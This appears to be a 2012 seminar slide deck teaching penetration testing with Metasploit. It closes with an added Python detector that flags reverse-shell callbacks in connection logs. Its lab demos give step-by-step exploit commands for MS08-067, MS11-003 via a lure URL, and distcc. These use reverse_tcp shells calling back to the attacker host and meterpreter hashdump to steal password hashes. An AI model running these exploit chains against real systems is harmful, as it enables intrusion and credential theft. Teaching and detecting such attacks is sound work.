Penetration Testing with Metasploit

Presented by Syarif

Seminar IT Security Safe The System
Sumedang, April 29 2012
STMIK Sumedang
Agenda
• Why & What’s Penetration Testing ( Pentest )
• << back|track Overview
• Metasploit Basics & Meterpreter
• DEMO :)
Whoami
• geek & Pentester
• infosec trouble maker
• InfoSec enthusiast
• CyberCrime investigator
• Lecturer & Engineer
Why Pentest ?
• Millions of dollars have been invested in security programs to protect critical infrastructure and prevent data breaches *1)
• Penetration testing is one of the most effective ways to identify weaknesses and deficiencies in these programs *1)
What’s Penetration Testing
• A method to evaluate the security of a computer system or network
• Attacking an IT system the way a ‘hacker’ would
• Find security holes ( weaknesses )
• Bypass security mechanisms
• Compromise an organization’s IT system security
You must have permission from the IT system owner ! Illegal activity puts you in jail.
Ethics
• Think before you act
• Don’t be stupid
• Don’t be malicious
Pentest Phases
• Vulnerability Analysis
• Information Gathering
• Exploitation
• Post Exploitation
• Reporting
<< back|track overview
• Let’s Watch the Video :)
<< back|track overview
• The Most Advanced Linux Security Distribution
• Open Source & Always will be
• Developed for Security Professionals
• Real World Pentesting Tools
<< back|track overview (screenshots)
What’s Metasploit
• Not just a tool, but an entire framework *1)
• An open source platform for writing security tools and exploits *2)
• Easily build attack vectors by adding its exploits, payloads and encoders
• Create and execute more advanced attacks
• Ruby based
Metasploit interfaces
• MSFconsole
• MSFcli
• msfweb, msfgui ( discontinued )
• Metasploit Pro, Metasploit Express
• Armitage
MSFconsole (screenshot)
MSFcli (screenshot)
Metasploit Terminology
• Exploit : code that allows a pentester to take advantage of a flaw within a system, application, or service *1)
• Payload : code that we want the target system to execute ( a few commands to be executed on the target system ) *1)
• Shellcode : a set of instructions used as a payload when exploitation occurs *1)
• Module : a piece of software that can be used by Metasploit *1)
• Listener : a component that waits for an incoming connection *1)
How does exploitation work ?
1. The attacker sends exploit + payload to the vulnerable server
2. The exploit runs, then the payload runs
3. Upload / Download data
Traditional Pentest vs Metasploit
Traditional Pentest :
• Public exploit gathering
• Change offsets
• Replace shellcode
• Execute
Metasploit for Pentest :
• Load Metasploit
• Choose the target OS
• Use exploit
• Set payload
• Execute
Meterpreter
• Used as a payload after a vulnerability is exploited *1)
• Improves post exploitation
Meterpreter : exploit a vulnerability → select meterpreter as the payload → meterpreter shell
Meterpreter command (screenshots)
Pentest Scenario
attacker vs. vulnerable OSes on VMware ( * : Ubuntu 8.04 Metasploitable )
OS in the Lab
• BackTrack 5 R2 : IP address 172.16.240.143
• Windows XP SP2 : IP address 172.16.240.129
• Windows 2003 Server : IP address 172.16.240.141
• Windows 7 : IP address 172.16.240.142
• Ubuntu Linux 8.04 ( Metasploitable ) : IP address 172.16.240.144
Windows XP Exploitation
• msf > search windows/smb
• msf > info exploit/windows/smb/ms08_067_netapi
• msf > use exploit/windows/smb/ms08_067_netapi
• msf exploit(ms08_067_netapi) > show payloads
• msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
• msf exploit(ms08_067_netapi) > show options
• msf exploit(ms08_067_netapi) > set RHOST 172.16.240.129
• msf exploit(ms08_067_netapi) > set LHOST 172.16.240.143
• msf exploit(ms08_067_netapi) > show options
• msf exploit(ms08_067_netapi) > exploit
• meterpreter > background
• msf exploit(ms08_067_netapi) > sessions -l
Windows XP Post Exploitation
• msf exploit(ms08_067_netapi) > sessions -i 1
• meterpreter > getsystem -h
• meterpreter > getuid
• meterpreter > hashdump
Windows 2003 Server Exploitation
• msf > search windows/smb
• msf > info exploit/windows/smb/ms08_067_netapi
• msf > use exploit/windows/smb/ms08_067_netapi
• msf exploit(ms08_067_netapi) > show payloads
• msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
• msf exploit(ms08_067_netapi) > show options
• msf exploit(ms08_067_netapi) > set RHOST 172.16.240.141
• msf exploit(ms08_067_netapi) > set LHOST 172.16.240.143
• msf exploit(ms08_067_netapi) > show options
• msf exploit(ms08_067_netapi) > exploit
• meterpreter > background
• msf exploit(ms08_067_netapi) > sessions -l
Windows 7 Exploitation
• msf > use exploit/windows/browser/ms11_003_ie_css_import
• msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp
• msf exploit(ms11_003_ie_css_import) > show options
• msf exploit(ms11_003_ie_css_import) > set SRVHOST 172.16.240.143
• msf exploit(ms11_003_ie_css_import) > set SRVPORT 80
• msf exploit(ms11_003_ie_css_import) > set URIPATH miyabi-naked.avi
• msf exploit(ms11_003_ie_css_import) > set LHOST 172.16.240.143
• msf exploit(ms11_003_ie_css_import) > set LPORT 443
• msf exploit(ms11_003_ie_css_import) > exploit
Then wait until the victim opens the URL http://172.16.240.143:80/miyabi-naked.avi
Windows 7 Exploitation
• msf exploit(ms11_003_ie_css_import) > sessions -l
• msf exploit(ms11_003_ie_css_import) > sessions -i 1
• meterpreter > sysinfo
• meterpreter > shell
Ubuntu 8.04 Metasploitable Exploitation
• search distcc
• use exploit/unix/misc/distcc_exec
• show payloads
• set PAYLOAD cmd/unix/reverse
• show options
• set rhost 172.16.240.144
• set lhost 172.16.240.143
• exploit
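All four demos follow the pattern of the "How does exploitation work" slide: the exploit is delivered, then the payload opens a new connection back to the attacker's host. As an added defender-side example that is not part of the deck, the correlator below flags a host calling back to the peer that had just delivered an exploit, using constructed connection-log lines built from the lab addresses; the log format, the 60-second window, and port 4444 (Metasploit's default LPORT, which the XP and Ubuntu demos leave unset) are assumptions.

```python
"""Callback correlator: flags the 'exploit delivered, then payload calls back'
pattern from the slides over constructed connection-log lines (added example)."""
import re
from datetime import datetime, timedelta

# Assumed: at most 60 s between exploit delivery and the payload's callback.
WINDOW = timedelta(seconds=60)

# Service ports the slides' server-side exploits are delivered to:
# 445 for SMB (ms08_067_netapi), 3632 for distcc (distcc_exec). Assumed defaults.
SERVICE_PORTS = {445, 3632}

# Constructed log format (not from the deck): "<iso-timestamp> src:port -> dst:port".
LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+)$"
)

# Constructed sample traffic using the addresses from the "OS in the Lab" slide.
# Port 4444 is Metasploit's default LPORT, which the XP and Ubuntu demos leave unset.
SAMPLE_LOG = [
    "2012-04-29T10:00:01 172.16.240.143:51234 -> 172.16.240.129:445",   # ms08_067 delivery to XP
    "2012-04-29T10:00:02 172.16.240.129:1043 -> 172.16.240.143:4444",   # reverse_tcp callback
    "2012-04-29T10:05:10 172.16.240.142:49152 -> 172.16.240.143:80",    # Win7 fetches the .avi URL
    "2012-04-29T10:05:12 172.16.240.142:49153 -> 172.16.240.143:443",   # meterpreter to LPORT 443
    "2012-04-29T10:10:00 172.16.240.143:40001 -> 172.16.240.144:3632",  # distcc_exec delivery
    "2012-04-29T10:10:01 172.16.240.144:33000 -> 172.16.240.143:4444",  # cmd/unix/reverse callback
    "2012-04-29T10:30:00 172.16.240.141:1060 -> 172.16.240.129:445",    # benign: 2003 Server opens an XP share
    "2012-04-29T10:40:00 172.16.240.142:49200 -> 172.16.240.143:80",    # benign: lone web fetch, no callback
]


def parse_line(line):
    """Parse one record into a dict, or return None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {
        "ts": datetime.fromisoformat(m["ts"]),
        "src": m["src"], "sport": int(m["sport"]),
        "dst": m["dst"], "dport": int(m["dport"]),
    }


def find_callbacks(lines, window=WINDOW):
    """Return (victim, peer, delivery_port, callback_port) for each suspected callback.

    A callback is a connection from host V to peer P that follows, within `window`,
    an earlier flow between V and P that could have carried the exploit: either P
    connecting to a service port on V (the SMB and distcc demos) or V fetching
    something from P and then opening a second connection on another port (the
    browser demo). Connections to a service port are never counted as callbacks:
    that is ordinary SMB or distcc traffic, not a reverse shell. The client-fetch
    rule also matches a plain HTTP-to-HTTPS redirect, so in production restrict
    the peer to hosts that are not known web servers.
    """
    flows = [f for f in (parse_line(l) for l in lines) if f]
    flows.sort(key=lambda f: f["ts"])
    alerts = []
    for i, cb in enumerate(flows):
        if cb["dport"] in SERVICE_PORTS:
            continue
        victim, peer = cb["src"], cb["dst"]
        for prior in flows[:i]:
            if cb["ts"] - prior["ts"] > window:
                continue
            inbound_exploit = (prior["src"] == peer and prior["dst"] == victim
                               and prior["dport"] in SERVICE_PORTS)
            client_fetch = (prior["src"] == victim and prior["dst"] == peer
                            and prior["dport"] != cb["dport"])
            if inbound_exploit or client_fetch:
                alerts.append((victim, peer, prior["dport"], cb["dport"]))
                break
    return alerts


if __name__ == "__main__":
    for victim, peer, delivered_on, called_back_on in find_callbacks(SAMPLE_LOG):
        print(f"{victim} called back to {peer}:{called_back_on} "
              f"right after a flow on port {delivered_on}")
```

Run against the sample it reports the XP, Windows 7 and Metasploitable callbacks and stays quiet on the two benign flows.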
Any Questions ?
Contact me
• website : http://fl3x.us
• twitter : @fl3xu5
Greet & Thanks To
• BackTrack Linux
• Metasploit Team ( HD Moore & rapid7 )
• Offensive Security / Metasploit Unleashed
• David Kennedy
• Georgia Weidman
References
• 1. Metasploit: The Penetration Tester’s Guide : David Kennedy, Jim O’Gorman, Devon Kearns, Mati Aharoni
• 2. http://www.metasploit.com
• 3. http://www.offensive-security.com/metasploit-unleashed/Main_Page
• 4. http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines